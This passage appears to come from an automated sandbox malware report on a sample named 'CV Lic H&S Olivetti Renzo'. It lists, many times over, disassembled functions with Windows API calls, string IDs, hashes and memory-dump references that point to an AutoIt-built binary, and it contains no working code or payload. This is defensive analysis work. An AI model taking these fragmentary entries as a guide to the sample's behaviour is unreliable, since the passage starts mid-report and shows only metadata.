                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CrackInternet_memset
                                                                                            • String ID: |
                                                                                            • API String ID: 1413715105-2343686810
                                                                                            • Opcode ID: 83e9772896ba005ace1b84d678cd1149c72c2c06d743d11dc4c536b34d73789b
                                                                                            • Instruction ID: d53ddcd50ddeb55193533fc40cf52118c3ed65c1d86ef2524d45614d39212a82
                                                                                            • Opcode Fuzzy Hash: 83e9772896ba005ace1b84d678cd1149c72c2c06d743d11dc4c536b34d73789b
                                                                                            • Instruction Fuzzy Hash: E8311971800119EBDF15EFA4CC85EEE7FB9FF54700F100029F919A6166DB31A946DBA0
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0012980E
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0012984A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$DestroyMove
                                                                                            • String ID: static
                                                                                            • API String ID: 2139405536-2160076837
                                                                                            • Opcode ID: 7452ed9ad8a48c41f085ce8672eb50351ff8034aa1ec3808a5c18befd084475a
                                                                                            • Instruction ID: 5764348339c518e7475f248baeede278a45d64ef870b44bff12f18a40f3b3a7e
                                                                                            • Opcode Fuzzy Hash: 7452ed9ad8a48c41f085ce8672eb50351ff8034aa1ec3808a5c18befd084475a
                                                                                            • Instruction Fuzzy Hash: D8317E71110618AEEB109F78DC81BFB73A9FF59760F148619F8A9C7190DB31AC91DB60
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001051C6
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00105201
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoItemMenu_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 2223754486-4108050209
                                                                                            • Opcode ID: 00a7f297b9c9be5fbfcaf8e8dbdc8133553d0edbb314eaf0113625138f285a25
                                                                                            • Instruction ID: 0f5afe6ff7b90224926fede6ac9b74b43fc76ae3a9d9afdd820f0a420fdce98d
                                                                                            • Opcode Fuzzy Hash: 00a7f297b9c9be5fbfcaf8e8dbdc8133553d0edbb314eaf0113625138f285a25
                                                                                            • Instruction Fuzzy Hash: D9318F31A00705EBEB24CF99D845BAFBBBAAF45354F144419E9C6A61E1D7F09A84CF10
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __snwprintf
                                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                            • API String ID: 2391506597-2584243854
                                                                                            • Opcode ID: 357d4d50d997148253e6bfee17323109b87b2341421ecf7a4c4308f4862d60b2
                                                                                            • Instruction ID: 405c749f5afb2c9f692c81b963023aba9f24fcedfa36f535091796227885c8e8
                                                                                            • Opcode Fuzzy Hash: 357d4d50d997148253e6bfee17323109b87b2341421ecf7a4c4308f4862d60b2
                                                                                            • Instruction Fuzzy Hash: 7C218D71600218AFCF24EFA4CC82FEE73B5AF45340F054469F509AB182DB71EA85DBA1
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0012945C
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00129467
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Combobox
                                                                                            • API String ID: 3850602802-2096851135
                                                                                            • Opcode ID: f237cb6669691c49c7be6df5515c866c4dc96248075cb429ff741eb9cbc4b1db
                                                                                            • Instruction ID: 49704c82c1ad580496bf0d9f1ecda5e53f8724bdd2c48c534bfd75794177dbba
                                                                                            • Opcode Fuzzy Hash: f237cb6669691c49c7be6df5515c866c4dc96248075cb429ff741eb9cbc4b1db
                                                                                            • Instruction Fuzzy Hash: 1D11B2B1300218BFEF25DE68EC80EFB376EEB483A4F114125F959972A0D7719C628760
                                                                                            APIs
                                                                                              • Part of subcall function 000DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                              • Part of subcall function 000DD17C: GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                              • Part of subcall function 000DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00129968
                                                                                            • GetSysColor.USER32(00000012), ref: 00129982
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                            • String ID: static
                                                                                            • API String ID: 1983116058-2160076837
                                                                                            • Opcode ID: a2403b4b4d674ac85797cb11b1065308cab177ee422db0eed8b2f87e70953845
                                                                                            • Instruction ID: 33a5e721c010b62f6eeb326595eab4a1b8784bc59e89e87dda453f2a1f8b2ce9
                                                                                            • Opcode Fuzzy Hash: a2403b4b4d674ac85797cb11b1065308cab177ee422db0eed8b2f87e70953845
                                                                                            • Instruction Fuzzy Hash: 1911297251021AAFDF04DFB8DC45AEA7BB8FB08354F054619F955D2250E734E861DB60
                                                                                            APIs
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00129699
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001296A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                            • String ID: edit
                                                                                            • API String ID: 2978978980-2167791130
                                                                                            • Opcode ID: 6611edb522b9fa35b782dae11ab60e257eb3e8dae170e23f3c4e0d06b73259ff
                                                                                            • Instruction ID: 69e7d63f09417e37cbc4b9ca0a0c7e7ede9d0a9f7c65e59186c7180e226ea90e
                                                                                            • Opcode Fuzzy Hash: 6611edb522b9fa35b782dae11ab60e257eb3e8dae170e23f3c4e0d06b73259ff
                                                                                            • Instruction Fuzzy Hash: 42118C71500218AFEF205FA8EC44EEB3BAAEB05378F504714F965971E0C775DCA19760
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001052D5
                                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001052F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoItemMenu_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 2223754486-4108050209
                                                                                            • Opcode ID: 1e86b38588c9af96d444546c6f2445c39d9e2ad1963073bef9610acf5d02b19e
                                                                                            • Instruction ID: 519208de5d4a13e5cde484937fe221bce9a5c20bd7097056efd0ac32a01b05e9
                                                                                            • Opcode Fuzzy Hash: 1e86b38588c9af96d444546c6f2445c39d9e2ad1963073bef9610acf5d02b19e
                                                                                            • Instruction Fuzzy Hash: 0811D076901614EBEB24DA98DD05B9E77BABB06750F150025F981AB2E0D3F0AE05CF90
                                                                                            APIs
                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00114DF5
                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00114E1E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$OpenOption
                                                                                            • String ID: <local>
                                                                                            • API String ID: 942729171-4266983199
                                                                                            • Opcode ID: c613f53bbfe3e8ac185a31d4a05d8f3135b7c2df8c51db089982c754f5ccccc6
                                                                                            • Instruction ID: 6e8ff014db483f2fb550d726173e55eff621e661536f2e300d57003dc4f23dde
                                                                                            • Opcode Fuzzy Hash: c613f53bbfe3e8ac185a31d4a05d8f3135b7c2df8c51db089982c754f5ccccc6
                                                                                            • Instruction Fuzzy Hash: 6A11A070601221BBDF2D8FA1D888EFBFAA8FF26B65F10823AF51556140D37059C1C6E0
                                                                                            APIs
                                                                                            • inet_addr.WSOCK32(00000000), ref: 0011A84E
                                                                                            • htons.WSOCK32(00000000), ref: 0011A88B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: htonsinet_addr
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 3832099526-2422070025
                                                                                            • Opcode ID: 7ed7d2274d51c459ca6300844857b48cb5a30a9353234178651b6407d13d86d2
                                                                                            • Instruction ID: 02fbccf1d9a07bb39fc41a8aaebbdbe2899a0294b278707610749d13647b7ddc
                                                                                            • Opcode Fuzzy Hash: 7ed7d2274d51c459ca6300844857b48cb5a30a9353234178651b6407d13d86d2
                                                                                            • Instruction Fuzzy Hash: 44014935200305ABCB149FA4D846FEDBB64EF45315F108436F515972D1DB71E842C752
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000FB7EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            • Opcode ID: 732d46f2ea1bc02201aa78473c204710e182b4a1a915b9892888d74c14e19bee
                                                                                            • Instruction ID: 880d4837615624a293d3925339588acfcac96f02a8778e05c0b30d21e4860389
                                                                                            • Opcode Fuzzy Hash: 732d46f2ea1bc02201aa78473c204710e182b4a1a915b9892888d74c14e19bee
                                                                                            • Instruction Fuzzy Hash: 6C01B171640118ABDB04FBA4CC52EFE33A9AF86350B04061DF566676D3EF7059099B90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 000FB6EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            • Opcode ID: 6556016ba1e2f5b2f75b5c53d0107a14ea0b6a0ce18fc77f22417d5735cdbdd8
                                                                                            • Instruction ID: 69402e26d2f4ebe00f37782a790bee756aaf0919c84c9a8bd29781e2ea1afd7b
                                                                                            • Opcode Fuzzy Hash: 6556016ba1e2f5b2f75b5c53d0107a14ea0b6a0ce18fc77f22417d5735cdbdd8
                                                                                            • Instruction Fuzzy Hash: A901F2B1640008ABDB04EBA4C912FFE33B89F06300F14001DF606B3693EF645E08ABB5
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 000FB76C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            • Opcode ID: 8f45e2c343b03f124eabc1acd92476b418dcd63a1e8607a3a14910d564b4efcf
                                                                                            • Instruction ID: d0ebc9628e3b5b4e3476087a5e8232e1312c967622a719363af21f8c388b415e
                                                                                            • Opcode Fuzzy Hash: 8f45e2c343b03f124eabc1acd92476b418dcd63a1e8607a3a14910d564b4efcf
                                                                                            • Instruction Fuzzy Hash: 6C01D6B5640108ABDB10F7A4C902FFE73AD9B45340F14001EF506B3593DF605E09ABB5
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcscmp
                                                                                            • String ID: #32770
                                                                                            • API String ID: 2292705959-463685578
                                                                                            • Opcode ID: 45cf9fc9b9af4a25eb87bcc97d9723e125ce4fc9d6fc361548cfa8111228f070
                                                                                            • Instruction ID: ac01a6e5e1f45d457641f2af3fef3c2b1affd0a1105eb355ed6fd36fa47a97bc
                                                                                            • Opcode Fuzzy Hash: 45cf9fc9b9af4a25eb87bcc97d9723e125ce4fc9d6fc361548cfa8111228f070
                                                                                            • Instruction Fuzzy Hash: 3EE0D877A043246BDB10EAA5EC09EC7FBACEB51B60F010016F959E3081D770E74187D0
                                                                                            APIs
                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000FA63F
                                                                                              • Part of subcall function 000E13F1: _doexit.LIBCMT ref: 000E13FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message_doexit
                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                            • API String ID: 1993061046-4017498283
                                                                                            • Opcode ID: f0bdc04afc14b7cbd048fcd8da8191829813c9dd991e42bbf1d642c7b297f9b3
                                                                                            • Instruction ID: baf42418b1b0218aeecdfed3117be54166c8cc0ab5176493588331b8caf913b0
                                                                                            • Opcode Fuzzy Hash: f0bdc04afc14b7cbd048fcd8da8191829813c9dd991e42bbf1d642c7b297f9b3
                                                                                            • Instruction Fuzzy Hash: 16D05B313C476837D21437A97C17FD9754C8B16B66F044056FB0C99AD34AE296D142E9
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 0013ACC0
                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0013AEBD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryFreeLibrarySystem
                                                                                            • String ID: WIN_XPe
                                                                                            • API String ID: 510247158-3257408948
                                                                                            • Opcode ID: 4b3c2db850bf232c74c115f44fd7b4206303e2b8cd52150c6a77d610dc6e02db
                                                                                            • Instruction ID: b1fd8e73f980062cc504c4a8ff458529d3a2904c1b5344a3be8b76578f1ae458
                                                                                            • Opcode Fuzzy Hash: 4b3c2db850bf232c74c115f44fd7b4206303e2b8cd52150c6a77d610dc6e02db
                                                                                            • Instruction Fuzzy Hash: E9E06D70C00209DFCF15DBA4D9449ECF7B8AF48300F509082E442B2660CB704A85DF22
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001286A2
                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001286B5
                                                                                              • Part of subcall function 00107A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            • Opcode ID: 0215887756be3141c8a4a10b6d7a88e6d7cb9abb3f2fe3700e27b490cab05552
                                                                                            • Instruction ID: 4f6bdd7272940fb8c018afb191d8267a2126782eb092b8469c70e251796423d8
                                                                                            • Opcode Fuzzy Hash: 0215887756be3141c8a4a10b6d7a88e6d7cb9abb3f2fe3700e27b490cab05552
                                                                                            • Instruction Fuzzy Hash: 8DD01235784314B7F6646770AC0BFC67A289B15B11F114915B78DAE1E0CAE4E980C764
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001286E2
                                                                                            • PostMessageW.USER32(00000000), ref: 001286E9
                                                                                              • Part of subcall function 00107A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
